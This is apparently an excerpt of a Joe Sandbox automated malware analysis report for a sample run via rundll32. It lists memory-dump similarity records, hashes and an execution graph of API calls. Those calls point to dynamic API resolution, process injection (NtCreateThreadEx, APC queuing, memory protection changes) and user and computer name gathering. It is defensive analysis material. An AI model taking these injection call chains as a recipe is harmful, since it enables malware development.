      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: ActionsShim$cannot create reader/writer lock
      • API String ID: 0-3821395182
      • Opcode ID: 90af42576f8b9e88bc76497404a4c90f79e3ff7b36981b2cb9481b3ad311e525
      • Instruction ID: 5362194995dedf51be220ecf943bbbeff3c2103531289cc3d0a6ebdf7eb1c8fc
      • Opcode Fuzzy Hash: 90af42576f8b9e88bc76497404a4c90f79e3ff7b36981b2cb9481b3ad311e525
      • Instruction Fuzzy Hash: 23414B32210B8881E795DB26E48439E7365F789BD4F54C125EE9D07BA5DF39CA99C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Lockitstd::_$Lockit::_Lockit::~_
      • String ID: bad locale name
      • API String ID: 593203224-1405518554
      • Opcode ID: 0a75c369d1590a7b9cdad47024db5ca3613b4c240e337ec2adf62f0efd43d4b2
      • Instruction ID: 3bfe555c786686dd313cd11618e8808d576bb14b31471c45e6f1dc0ab111c233
      • Opcode Fuzzy Hash: 0a75c369d1590a7b9cdad47024db5ca3613b4c240e337ec2adf62f0efd43d4b2
      • Instruction Fuzzy Hash: 8F413D32702B88C9FB96DFB0D4947ED33A4EB48758F448425EE4927A5ACF34C62AD344
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: D:\Jenkins\workspace\N_Poco-VS2022\poco-1.12.4\Foundation\src\UUID.cpp$uuid
      • API String ID: 3668304517-2288208422
      • Opcode ID: 25911d32c636301b8ceb874fa757822df2c01a8879f203403be8eb1c072caf74
      • Instruction ID: 3d5646af06f48f4ead0dfc35d341a1075a49795fa3766d4bc0825e9f98b57a39
      • Opcode Fuzzy Hash: 25911d32c636301b8ceb874fa757822df2c01a8879f203403be8eb1c072caf74
      • Instruction Fuzzy Hash: 8111E5B1A10A8C41EE93D72594463ED5322BB9D7F4F51E311F9BD026E69F68C38D8300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: ios_base::failbit set$vector too long
      • API String ID: 3668304517-3964744372
      • Opcode ID: 81fac164eb8069a64abdcd1d1755faf9489d3efc6c2a7fce3fddaad9cab7cb75
      • Instruction ID: 5d250b1aaa5fc9c5f3c4f56a8d0ffd0adc0d6c55e903586678183011968d96e5
      • Opcode Fuzzy Hash: 81fac164eb8069a64abdcd1d1755faf9489d3efc6c2a7fce3fddaad9cab7cb75
      • Instruction Fuzzy Hash: FFF0B471312A4885EF8ADF75D4583ED3291AB0CF94F548421EA8C46645DF28C6A88300
      APIs
      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00000001801052A2), ref: 0000000180108FF8
      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00000001801052A2), ref: 0000000180109039
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ExceptionFileHeaderRaise
      • String ID: csm
      • API String ID: 2573137834-1018135373
      • Opcode ID: 8ec78f723e8811bbb8f7cc3519f6b9e5d1aa5e1655d1be73bc864709e2988a38
      • Instruction ID: f49007e085962bb718d790a48bb9d5fc839186ba87080fc6a7ab3081cfab14e1
      • Opcode Fuzzy Hash: 8ec78f723e8811bbb8f7cc3519f6b9e5d1aa5e1655d1be73bc864709e2988a38
      • Instruction Fuzzy Hash: A311FB32215B8482EBA2CB25E44439977E5FB8CBA4F598225EACD07769DF38C655CB00

      Execution Graph

      Execution Coverage:4.3%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:0.9%
      Total number of Nodes:1814
      Total number of Limit Nodes:10
      execution_graph 17751 1b0a35cc300 17762 1b0a35c1440 17751->17762 17761 1b0a35cc341 17763 1b0a35c1459 17762->17763 17764 1b0a35c77e0 2 API calls 17763->17764 17766 1b0a35c1463 17763->17766 17765 1b0a35c14b2 17764->17765 17765->17766 17767 1b0a35bcce0 LdrGetProcedureAddress 17765->17767 17794 1b0a35c0fb0 17766->17794 17768 1b0a35c14d2 17767->17768 17769 1b0a35bcce0 LdrGetProcedureAddress 17768->17769 17770 1b0a35c14ed 17769->17770 17771 1b0a35bcce0 LdrGetProcedureAddress 17770->17771 17772 1b0a35c1516 17771->17772 17773 1b0a35bcce0 LdrGetProcedureAddress 17772->17773 17774 1b0a35c1535 17773->17774 17775 1b0a35bcce0 LdrGetProcedureAddress 17774->17775 17776 1b0a35c1554 17775->17776 17777 1b0a35bcce0 LdrGetProcedureAddress 17776->17777 17778 1b0a35c1573 17777->17778 17779 1b0a35bcce0 LdrGetProcedureAddress 17778->17779 17780 1b0a35c1592 17779->17780 17781 1b0a35bcce0 LdrGetProcedureAddress 17780->17781 17782 1b0a35c15b1 17781->17782 17783 1b0a35bcce0 LdrGetProcedureAddress 17782->17783 17784 1b0a35c15d0 17783->17784 17785 1b0a35bcce0 LdrGetProcedureAddress 17784->17785 17786 1b0a35c15ef 17785->17786 17787 1b0a35bcce0 LdrGetProcedureAddress 17786->17787 17788 1b0a35c160e 17787->17788 17789 1b0a35bcce0 LdrGetProcedureAddress 17788->17789 17790 1b0a35c162d 17789->17790 17791 1b0a35bcce0 LdrGetProcedureAddress 17790->17791 17792 1b0a35c164c 17791->17792 17793 1b0a35bcce0 LdrGetProcedureAddress 17792->17793 17793->17766 17795 1b0a35c0fc9 17794->17795 17796 1b0a35c77e0 2 API calls 17795->17796 17798 1b0a35c0fd3 17795->17798 17797 1b0a35c1022 17796->17797 17797->17798 17799 1b0a35bcce0 LdrGetProcedureAddress 17797->17799 17814 1b0a35c2ae0 17798->17814 17800 1b0a35c1042 17799->17800 17801 1b0a35bcce0 LdrGetProcedureAddress 17800->17801 17802 1b0a35c105d 17801->17802 17803 1b0a35bcce0 LdrGetProcedureAddress 17802->17803 17804 1b0a35c1086 17803->17804 17805 1b0a35bcce0 LdrGetProcedureAddress 17804->17805 17806 1b0a35c10a5 17805->17806 17807 1b0a35bcce0 LdrGetProcedureAddress 17806->17807 17808 1b0a35c10c4 17807->17808 17809 1b0a35bcce0 LdrGetProcedureAddress 17808->17809 17810 1b0a35c10e3 17809->17810 17811 1b0a35bcce0 LdrGetProcedureAddress 17810->17811 17812 1b0a35c1102 17811->17812 17813 1b0a35bcce0 LdrGetProcedureAddress 17812->17813 17813->17798 17816 1b0a35c2af7 17814->17816 17815 1b0a35c2b01 17830 1b0a35c28c0 17815->17830 17816->17815 17817 1b0a35c77e0 2 API calls 17816->17817 17818 1b0a35c2b56 17817->17818 17818->17815 17819 1b0a35bcce0 LdrGetProcedureAddress 17818->17819 17820 1b0a35c2b76 17819->17820 17821 1b0a35bcce0 LdrGetProcedureAddress 17820->17821 17822 1b0a35c2b91 17821->17822 17823 1b0a35bcce0 LdrGetProcedureAddress 17822->17823 17824 1b0a35c2bba 17823->17824 17825 1b0a35bcce0 LdrGetProcedureAddress 17824->17825 17826 1b0a35c2bd9 17825->17826 17827 1b0a35bcce0 LdrGetProcedureAddress 17826->17827 17828 1b0a35c2bf8 17827->17828 17829 1b0a35bcce0 LdrGetProcedureAddress 17828->17829 17829->17815 17831 1b0a35c28d9 17830->17831 17832 1b0a35c77e0 2 API calls 17831->17832 17834 1b0a35c28e3 17831->17834 17833 1b0a35c2932 17832->17833 17833->17834 17835 1b0a35bcce0 LdrGetProcedureAddress 17833->17835 17858 1b0a35bf960 17834->17858 17836 1b0a35c2952 17835->17836 17837 1b0a35bcce0 LdrGetProcedureAddress 17836->17837 17838 1b0a35c296d 17837->17838 17839 1b0a35bcce0 LdrGetProcedureAddress 17838->17839 17840 1b0a35c2996 17839->17840 17841 1b0a35bcce0 LdrGetProcedureAddress 17840->17841 17842 1b0a35c29b5 17841->17842 17843 1b0a35bcce0 LdrGetProcedureAddress 17842->17843 17844 1b0a35c29d4 17843->17844 17845 1b0a35bcce0 LdrGetProcedureAddress 17844->17845 17846 1b0a35c29f3 17845->17846 17847 1b0a35bcce0 LdrGetProcedureAddress 17846->17847 17848 1b0a35c2a12 17847->17848 17849 1b0a35bcce0 LdrGetProcedureAddress 17848->17849 17850 1b0a35c2a31 17849->17850 17851 1b0a35bcce0 LdrGetProcedureAddress 17850->17851 17852 1b0a35c2a50 17851->17852 17853 1b0a35bcce0 LdrGetProcedureAddress 17852->17853 17854 1b0a35c2a6f 17853->17854 17855 1b0a35bcce0 LdrGetProcedureAddress 17854->17855 17856 1b0a35c2a8e 17855->17856 17857 1b0a35bcce0 LdrGetProcedureAddress 17856->17857 17857->17834 17859 1b0a35bf978 17858->17859 17860 1b0a35c77e0 2 API calls 17859->17860 17863 1b0a35bf982 17859->17863 17861 1b0a35bf9d1 17860->17861 17862 1b0a35bcce0 LdrGetProcedureAddress 17861->17862 17861->17863 17862->17863 17863->17761 18537 1b0a35cbc00 18538 1b0a35cbc20 18537->18538 18539 1b0a35cbc30 18538->18539 18540 1b0a35c3270 3 API calls 18538->18540 18540->18539 17864 1b0a35ce100 17869 1b0a35d5a60 17864->17869 17867 1b0a35ce157 17870 1b0a35e51c0 NtReadVirtualMemory 17869->17870 17871 1b0a35d5a8e 17870->17871 17872 1b0a35e51c0 NtReadVirtualMemory 17871->17872 17873 1b0a35ce127 17872->17873 17873->17867 17874 1b0a35c9760 17873->17874 17877 1b0a35c2650 17874->17877 17876 1b0a35c9775 17876->17867 17879 1b0a35c2666 17877->17879 17878 1b0a35c2670 17878->17876 17879->17878 17880 1b0a35c77e0 2 API calls 17879->17880 17881 1b0a35c26c4 17880->17881 17882 1b0a35c281f 17881->17882 17883 1b0a35c26d7 17881->17883 17884 1b0a35bcce0 LdrGetProcedureAddress 17882->17884 17885 1b0a35bcce0 LdrGetProcedureAddress 17883->17885 17886 1b0a35c2833 17884->17886 17887 1b0a35c26e7 17885->17887 17888 1b0a35bcce0 LdrGetProcedureAddress 17886->17888 17889 1b0a35c2707 17887->17889 17892 1b0a35bcce0 LdrGetProcedureAddress 17887->17892 17891 1b0a35c284b 17888->17891 17890 1b0a35bcce0 LdrGetProcedureAddress 17889->17890 17893 1b0a35c2726 17890->17893 17894 1b0a35bcce0 LdrGetProcedureAddress 17891->17894 17892->17889 17897 1b0a35bcce0 LdrGetProcedureAddress 17893->17897 17900 1b0a35c2743 17893->17900 17895 1b0a35c2863 17894->17895 17896 1b0a35bcce0 LdrGetProcedureAddress 17895->17896 17899 1b0a35c287b 17896->17899 17897->17900 17898 1b0a35bcce0 LdrGetProcedureAddress 17901 1b0a35c2767 17898->17901 17902 1b0a35bcce0 LdrGetProcedureAddress 17899->17902 17900->17898 17903 1b0a35c2784 17901->17903 17904 1b0a35bcce0 LdrGetProcedureAddress 17901->17904 17902->17878 17905 1b0a35bcce0 LdrGetProcedureAddress 17903->17905 17904->17903 17906 1b0a35c27a8 17905->17906 17907 1b0a35c27c5 17906->17907 17908 1b0a35bcce0 LdrGetProcedureAddress 17906->17908 17909 1b0a35bcce0 LdrGetProcedureAddress 17907->17909 17908->17907 17910 1b0a35c27e9 17909->17910 17910->17878 17911 1b0a35bcce0 LdrGetProcedureAddress 17910->17911 17911->17878 17912 1b0a35d8d00 17913 1b0a35d8d21 17912->17913 17914 1b0a35d8de3 17913->17914 17916 1b0a35db5e0 17913->17916 17918 1b0a35db5f6 17916->17918 17917 1b0a35db77a 17917->17914 17918->17917 17919 1b0a35dba6c 17918->17919 17920 1b0a35dba97 17918->17920 17923 1b0a35d3a20 17919->17923 17920->17917 17929 1b0a35d37b0 17920->17929 17927 1b0a35d3a8c 17923->17927 17928 1b0a35d3a97 17923->17928 17925 1b0a35d3c6b 17925->17927 17943 1b0a35b5d60 17925->17943 17927->17917 17928->17925 17928->17927 17935 1b0a35b3c30 17928->17935 17930 1b0a35d39e5 17929->17930 17932 1b0a35d3811 17929->17932 17930->17917 17931 1b0a35d387a 17934 1b0a35b5d60 2 API calls 17931->17934 17932->17930 17932->17931 17933 1b0a35b3c30 2 API calls 17932->17933 17933->17931 17934->17930 17936 1b0a35b3ca3 17935->17936 17940 1b0a35b3cac 17935->17940 17937 1b0a35e4be0 NtProtectVirtualMemory 17936->17937 17936->17940 17937->17940 17938 1b0a35b3da0 17938->17925 17939 1b0a35b3d78 17939->17938 17942 1b0a35e4740 NtFreeVirtualMemory 17939->17942 17940->17938 17940->17939 17941 1b0a35e4740 NtFreeVirtualMemory 17940->17941 17941->17939 17942->17938 17944 1b0a35b5e68 17943->17944 17945 1b0a35b5dc2 17943->17945 17944->17927 17945->17944 17946 1b0a35b5f8b 17945->17946 17951 1b0a35b61a1 17945->17951 17946->17944 17947 1b0a35b605a 17946->17947 17948 1b0a35b6033 17946->17948 17950 1b0a35e4360 NtCreateThreadEx 17947->17950 17949 1b0a35e4360 NtCreateThreadEx 17948->17949 17949->17944 17950->17944 17951->17944 17952 1b0a35e4ff0 RtlQueueApcWow64Thread 17951->17952 17952->17944 18637 1b0a35dca80 18640 1b0a35b99d0 18637->18640 18639 1b0a35dca96 18651 1b0a35bfc40 18640->18651 18645 1b0a35c2d20 3 API calls 18646 1b0a35b9a0a 18645->18646 18647 1b0a35c2210 3 API calls 18646->18647 18649 1b0a35b9a0f 18647->18649 18648 1b0a35b4cd0 2 API calls 18648->18649 18649->18648 18650 1b0a35b9b2d 18649->18650 18650->18639 18652 1b0a35bfc57 18651->18652 18654 1b0a35b99f8 18652->18654 18655 1b0a35c77e0 2 API calls 18652->18655 18663 1b0a35bfcd5 18652->18663 18653 1b0a35bcce0 LdrGetProcedureAddress 18656 1b0a35bfcf0 18653->18656 18681 1b0a35bfe80 18654->18681 18657 1b0a35bfcb5 18655->18657 18658 1b0a35bcce0 LdrGetProcedureAddress 18656->18658 18657->18654 18660 1b0a35bcce0 LdrGetProcedureAddress 18657->18660 18659 1b0a35bfd19 18658->18659 18661 1b0a35bcce0 LdrGetProcedureAddress 18659->18661 18660->18663 18662 1b0a35bfd38 18661->18662 18664 1b0a35bcce0 LdrGetProcedureAddress 18662->18664 18663->18653 18665 1b0a35bfd57 18664->18665 18666 1b0a35bcce0 LdrGetProcedureAddress 18665->18666 18667 1b0a35bfd76 18666->18667 18668 1b0a35bcce0 LdrGetProcedureAddress 18667->18668 18669 1b0a35bfd95 18668->18669 18670 1b0a35bcce0 LdrGetProcedureAddress 18669->18670 18671 1b0a35bfdb4 18670->18671 18672 1b0a35bcce0 LdrGetProcedureAddress 18671->18672 18673 1b0a35bfdd3 18672->18673 18674 1b0a35bcce0 LdrGetProcedureAddress 18673->18674 18675 1b0a35bfdf2 18674->18675 18676 1b0a35bcce0 LdrGetProcedureAddress 18675->18676 18677 1b0a35bfe11 18676->18677 18678 1b0a35bcce0 LdrGetProcedureAddress 18677->18678 18679 1b0a35bfe30 18678->18679 18680 1b0a35bcce0 LdrGetProcedureAddress 18679->18680 18680->18654 18683 1b0a35bfe97 18681->18683 18682 1b0a35b9a05 18682->18645 18683->18682 18684 1b0a35c77e0 2 API calls 18683->18684 18685 1b0a35bfef6 18684->18685 18685->18682 18686 1b0a35bcce0 LdrGetProcedureAddress 18685->18686 18687 1b0a35bff16 18686->18687 18688 1b0a35bcce0 LdrGetProcedureAddress 18687->18688 18689 1b0a35bff31 18688->18689 18690 1b0a35bcce0 LdrGetProcedureAddress 18689->18690 18691 1b0a35bff5a 18690->18691 18692 1b0a35bcce0 LdrGetProcedureAddress 18691->18692 18693 1b0a35bff79 18692->18693 18694 1b0a35bcce0 LdrGetProcedureAddress 18693->18694 18695 1b0a35bff98 18694->18695 18696 1b0a35bcce0 LdrGetProcedureAddress 18695->18696 18696->18682 18697 1b0a35d9c80 18699 1b0a35d9c9d 18697->18699 18698 1b0a35d9d43 18699->18698 18700 1b0a35b99d0 5 API calls 18699->18700 18700->18698 17953 1b0a35deb00 17955 1b0a35deb20 17953->17955 17954 1b0a35deb7c 17955->17954 17957 1b0a35d7220 17955->17957 17958 1b0a35d731d 17957->17958 17961 1b0a35d732b 17958->17961 17963 1b0a35debb0 17958->17963 17960 1b0a35d759b 17960->17961 17970 1b0a35cdcb0 17960->17970 17961->17954 17977 1b0a35bfa20 17963->17977 17967 1b0a35debcf 17969 1b0a35debe4 17967->17969 17997 1b0a35cd660 17967->17997 17969->17960 17972 1b0a35cdcdb 17970->17972 17971 1b0a35cdd54 17971->17960 17972->17971 17973 1b0a35cdf3a 17972->17973 17974 1b0a35cdf41 17972->17974 17975 1b0a35c6fa0 3 API calls 17973->17975 17976 1b0a35b7830 6 API calls 17974->17976 17975->17971 17976->17971 17979 1b0a35bfa37 17977->17979 17978 1b0a35bfa41 17987 1b0a35c3170 17978->17987 17979->17978 17980 1b0a35c77e0 2 API calls 17979->17980 17981 1b0a35bfa96 17980->17981 17981->17978 17982 1b0a35bcce0 LdrGetProcedureAddress 17981->17982 17983 1b0a35bfab2 17982->17983 17984 1b0a35bcce0 LdrGetProcedureAddress 17983->17984 17985 1b0a35bfacd 17984->17985 17986 1b0a35bcce0 LdrGetProcedureAddress 17985->17986 17986->17978 17989 1b0a35c3187 17987->17989 17988 1b0a35c3191 17988->17967 17989->17988 17990 1b0a35c77e0 2 API calls 17989->17990 17991 1b0a35c31e6 17990->17991 17991->17988 17992 1b0a35bcce0 LdrGetProcedureAddress 17991->17992 17993 1b0a35c3202 17992->17993 17994 1b0a35bcce0 LdrGetProcedureAddress 17993->17994 17995 1b0a35c321d 17994->17995 17996 1b0a35bcce0 LdrGetProcedureAddress 17995->17996 17996->17988 17999 1b0a35cd6a8 17997->17999 17998 1b0a35cd7c0 17998->17969 17999->17998 18000 1b0a35e51c0 NtReadVirtualMemory 17999->18000 18000->17999 18701 1b0a35b4885 18702 1b0a35b4950 18701->18702 18706 1b0a35b4acf 18702->18706 18711 1b0a35b2680 18702->18711 18704 1b0a35b4a16 18704->18706 18719 1b0a35b52a0 18704->18719 18707 1b0a35b4a68 18707->18706 18727 1b0a35b1f00 18707->18727 18709 1b0a35b4aaa 18710 1b0a35b1f00 NtReadVirtualMemory 18709->18710 18710->18706 18713 1b0a35b273e 18711->18713 18712 1b0a35b27d3 18714 1b0a35ba370 NtReadVirtualMemory 18712->18714 18717 1b0a35b27da 18712->18717 18713->18712 18737 1b0a35ba370 18713->18737 18718 1b0a35b2805 18714->18718 18716 1b0a35ba370 NtReadVirtualMemory 18716->18718 18717->18704 18718->18716 18718->18717 18720 1b0a35b52e7 18719->18720 18721 1b0a35b5302 18720->18721 18741 1b0a35b5190 18720->18741 18721->18707 18723 1b0a35b5323 18723->18721 18724 1b0a35ba370 NtReadVirtualMemory 18723->18724 18725 1b0a35b5361 18724->18725 18725->18721 18726 1b0a35ba370 NtReadVirtualMemory 18725->18726 18726->18721 18728 1b0a35b1f3e 18727->18728 18729 1b0a35ba370 NtReadVirtualMemory 18728->18729 18730 1b0a35b1f87 18728->18730 18736 1b0a35b1f83 18729->18736 18730->18709 18731 1b0a35ba370 NtReadVirtualMemory 18731->18736 18732 1b0a35b21c0 NtReadVirtualMemory 18732->18736 18736->18730 18736->18731 18736->18732 18747 1b0a35b2140 18736->18747 18752 1b0a35b2be0 18736->18752 18764 1b0a35b36a0 18736->18764 18738 1b0a35ba38c 18737->18738 18739 1b0a35ba3a6 18737->18739 18738->18712 18739->18738 18740 1b0a35e51c0 NtReadVirtualMemory 18739->18740 18740->18738 18742 1b0a35b51dd 18741->18742 18745 1b0a35b51d4 18741->18745 18743 1b0a35ba370 NtReadVirtualMemory 18742->18743 18742->18745 18744 1b0a35b5218 18743->18744 18744->18745 18746 1b0a35b5190 NtReadVirtualMemory 18744->18746 18745->18723 18746->18745 18748 1b0a35ba370 NtReadVirtualMemory 18747->18748 18750 1b0a35b2175 18748->18750 18749 1b0a35b2179 18749->18736 18750->18749 18751 1b0a35ba370 NtReadVirtualMemory 18750->18751 18751->18749 18753 1b0a35b2d40 18752->18753 18762 1b0a35b2deb 18752->18762 18754 1b0a35b2d53 18753->18754 18756 1b0a35b52a0 NtReadVirtualMemory 18753->18756 18753->18762 18755 1b0a35ba370 NtReadVirtualMemory 18754->18755 18754->18762 18757 1b0a35b2d7a 18755->18757 18756->18754 18759 1b0a35b2daa 18757->18759 18770 1b0a35b5070 18757->18770 18760 1b0a35ba370 NtReadVirtualMemory 18759->18760 18759->18762 18761 1b0a35b2e4b 18760->18761 18761->18762 18779 1b0a35b2ea0 18761->18779 18762->18736 18765 1b0a35b37e3 18764->18765 18768 1b0a35b36de 18764->18768 18765->18736 18766 1b0a35ba370 NtReadVirtualMemory 18766->18768 18767 1b0a35b21c0 NtReadVirtualMemory 18767->18768 18768->18765 18768->18766 18768->18767 18789 1b0a35b3800 18768->18789 18771 1b0a35ba370 NtReadVirtualMemory 18770->18771 18776 1b0a35b50aa 18771->18776 18772 1b0a35b50ae 18772->18759 18773 1b0a35b50bf 18773->18772 18774 1b0a35b50c9 18773->18774 18775 1b0a35b5070 NtReadVirtualMemory 18773->18775 18774->18772 18777 1b0a35b5070 NtReadVirtualMemory 18774->18777 18775->18774 18776->18772 18776->18773 18778 1b0a35ba370 NtReadVirtualMemory 18776->18778 18777->18772 18778->18773 18780 1b0a35b2efe 18779->18780 18781 1b0a35b321d 18779->18781 18780->18781 18782 1b0a35ba370 NtReadVirtualMemory 18780->18782 18781->18762 18783 1b0a35b2f42 18782->18783 18783->18781 18784 1b0a35ba370 NtReadVirtualMemory 18783->18784 18786 1b0a35b30d7 18784->18786 18785 1b0a35b31b7 18785->18781 18787 1b0a35ba370 NtReadVirtualMemory 18785->18787 18786->18781 18786->18785 18788 1b0a35ba370 NtReadVirtualMemory 18786->18788 18787->18781 18788->18786 18791 1b0a35b3862 18789->18791 18790 1b0a35b3a08 18790->18768 18791->18790 18792 1b0a35ba370 NtReadVirtualMemory 18791->18792 18792->18790 16891 1b0a35b7bf0 16892 1b0a35b7c06 16891->16892 16905 1b0a35b2930 16892->16905 16894 1b0a35b7c24 17046 1b0a35b8ed0 16894->17046 16896 1b0a35b7d64 17050 1b0a35d4d00 GetUserNameW GetComputerNameExW 16896->17050 16898 1b0a35b7f54 16899 1b0a35b7da4 16899->16898 17062 1b0a35e4740 16899->17062 16902 1b0a35c8c60 CreateFiber DeleteFiber 16904 1b0a35b7e3b 16902->16904 16904->16898 16904->16902 17066 1b0a35c3d90 16904->17066 17074 1b0a35b8bc0 16904->17074 17083 1b0a35bffe0 16905->17083 16911 1b0a35b2943 17161 1b0a35c77e0 16911->17161 16913 1b0a35bedf0 16914 1b0a35bf5f5 16913->16914 17167 1b0a35bcce0 16913->17167 16914->16894 16917 1b0a35bcce0 LdrGetProcedureAddress 16918 1b0a35bee2b 16917->16918 16919 1b0a35bcce0 LdrGetProcedureAddress 16918->16919 16920 1b0a35bee54 16919->16920 16921 1b0a35bcce0 LdrGetProcedureAddress 16920->16921 16922 1b0a35bee73 16921->16922 16923 1b0a35bcce0 LdrGetProcedureAddress 16922->16923 16924 1b0a35bee92 16923->16924 16925 1b0a35bcce0 LdrGetProcedureAddress 16924->16925 16926 1b0a35beeb1 16925->16926 16927 1b0a35bcce0 LdrGetProcedureAddress 16926->16927 16928 1b0a35beed0 16927->16928 16929 1b0a35bcce0 LdrGetProcedureAddress 16928->16929 16930 1b0a35beeef 16929->16930 16931 1b0a35bcce0 LdrGetProcedureAddress 16930->16931 16932 1b0a35bef0e 16931->16932 16933 1b0a35bcce0 LdrGetProcedureAddress 16932->16933 16934 1b0a35bef2d 16933->16934 16935 1b0a35bcce0 LdrGetProcedureAddress 16934->16935 16936 1b0a35bef4c 16935->16936 16937 1b0a35bcce0 LdrGetProcedureAddress 16936->16937 16938 1b0a35bef6b 16937->16938 16939 1b0a35bcce0 LdrGetProcedureAddress 16938->16939 16940 1b0a35bef8a 16939->16940 16941 1b0a35bcce0 LdrGetProcedureAddress 16940->16941 16942 1b0a35befa9 16941->16942 16943 1b0a35bcce0 LdrGetProcedureAddress 16942->16943 16944 1b0a35befc8 16943->16944 16945 1b0a35bcce0 LdrGetProcedureAddress 16944->16945 16946 1b0a35befe7 16945->16946 16947 1b0a35bcce0 LdrGetProcedureAddress 16946->16947 16948 1b0a35bf006 16947->16948 16949 1b0a35bcce0 LdrGetProcedureAddress 16948->16949 16950 1b0a35bf025 16949->16950 16951 1b0a35bcce0 